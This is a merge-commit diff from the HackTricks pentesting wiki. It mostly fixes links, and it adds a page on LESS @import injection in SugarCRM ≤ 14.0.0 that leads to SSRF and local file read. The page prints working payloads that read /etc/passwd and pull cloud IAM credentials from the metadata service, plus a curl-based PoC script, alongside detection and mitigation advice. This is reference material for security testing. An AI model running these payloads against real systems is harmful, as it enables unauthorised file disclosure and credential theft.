Merge pull request #1119 from HackTricks-wiki/update_SugarCRM___14_0_0__css_preview__LESS_Code_Injectio_20250714_123930

SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerab...
2025-10-10 18:36:50 +00:00 · 2025-07-15 12:38:08 +02:00 · 2025-07-15 12:38:08 +02:00 · 89503b1c9d
commit 89503b1c9d
parent cec78bcdf8 c3f4c8eaf6
6 changed files with 92 additions and 4 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -544,6 +544,7 @@

 # 🕸️ Pentesting Web

+- [Less Code Injection Ssrf](pentesting-web/less-code-injection-ssrf.md)
 - [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
 - [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
  - [Web Vulns List](pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md)
--- a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
+++ b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p
 * NexMon Magisk ZIP or self-compiled patch providing:
  * `/system/lib*/libnexmon.so`
  * `/system/xbin/nexutil`
-* Hijacker ≥ 1.7 (arm/arm64) – https://github.com/chrisk44/Hijacker
+* Hijacker ≥ 1.7 (arm/arm64) – [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker)
 * (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools

 ---
@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2-
 * [NexMon – firmware patching framework](https://github.com/seemoo-lab/nexmon)
 * [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker)

-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth

 ### Automated dynamic analysis with MobSF (no jailbreak)

-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:

 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest
--- a/src/network-services-pentesting/pentesting-telnet.md
+++ b/src/network-services-pentesting/pentesting-telnet.md
@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with



-{{#include /banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
--- a/src/pentesting-web/less-code-injection-ssrf.md
+++ b/src/pentesting-web/less-code-injection-ssrf.md
@ -0,0 +1,81 @@
+# LESS Code Injection leading to SSRF & Local File Read
+
+{{#include ../banners/hacktricks-training.md}}
+
+## Overview
+
+LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
+
+When an application concatenates **user-controlled input** into a string that is later parsed by the LESS compiler, an attacker can **inject arbitrary LESS code**.  By abusing `@import (inline)` the attacker can force the server to retrieve:
+
+* Local files via the `file://` protocol (information disclosure / Local File Inclusion).
+* Remote resources on internal networks or cloud metadata services (SSRF).
+
+This technique has been seen in real-world products such as **SugarCRM ≤ 14.0.0** (`/rest/v10/css/preview` endpoint).
+
+## Exploitation
+
+1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. `?lm=` in SugarCRM).
+2. Close the current statement and inject new directives.  The most common primitives are:
+   * `;`  – terminates the previous declaration.
+   * `}`  – closes the previous block (if required).
+3. Use `@import (inline) '<URL>';` to read arbitrary resources.
+4. Optionally inject a **marker** (`data:` URI) after the import to ease extraction of the fetched content from the compiled CSS.
+
+### Local File Read
+
+```
+1; @import (inline) 'file:///etc/passwd';
+@import (inline) 'data:text/plain,@@END@@'; //
+```
+
+The contents of `/etc/passwd` will appear in the HTTP response just before the `@@END@@` marker.
+
+### SSRF – Cloud Metadata
+
+```
+1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
+@import (inline) 'data:text/plain,@@END@@'; //
+```
+
+### Automated PoC (SugarCRM example)
+
+```bash
+#!/usr/bin/env bash
+# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd
+
+TARGET="$1"        # Base URL of SugarCRM instance
+RESOURCE="$2"      # file:// path or URL to fetch
+
+INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")
+
+curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
+  sed -n 's/.*@@END@@\(.*\)/\1/p'
+```
+
+## Detection
+
+* Look for dynamically generated `.less` or `.css` responses containing unsanitised query parameters.
+* During code review, search for constructions like `"@media all { .preview { ... ${userInput} ... } }"` passed to LESS render functions.
+* Exploit attempts often include `@import`, `(inline)`, `file://`, `http://169.254.169.254`, etc.
+
+## Mitigations
+
+* Do **not** pass untrusted data to the LESS compiler.
+* If dynamic values are required, properly **escape**/sanitize them (e.g., restrict to numeric tokens, whitelists).
+* Disable, when possible, the ability to use `(inline)` imports, or limit allowed protocols to `https`.
+* Keep dependencies up to date – SugarCRM patched this issue in versions 13.0.4 and 14.0.1.
+
+## Real-World Cases
+
+| Product | Vulnerable Endpoint | Impact |
+|---------|--------------------|--------|
+| SugarCRM ≤ 14.0.0 | `/rest/v10/css/preview?lm=` | Unauthenticated SSRF & local file read |
+
+## References
+
+* [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
+* [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
+* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+
+{{#include ../banners/hacktricks-training.md}}
--- a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
@ -4,6 +4,12 @@

 Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**

+- SugarCRM ≤ 14.0.0 – LESS `@import` injection in `/rest/v10/css/preview` enables unauthenticated SSRF & local file read.
+
+{{#ref}}
+../less-code-injection-ssrf.md
+{{#endref}}
+
 {{#include ../../banners/hacktricks-training.md}}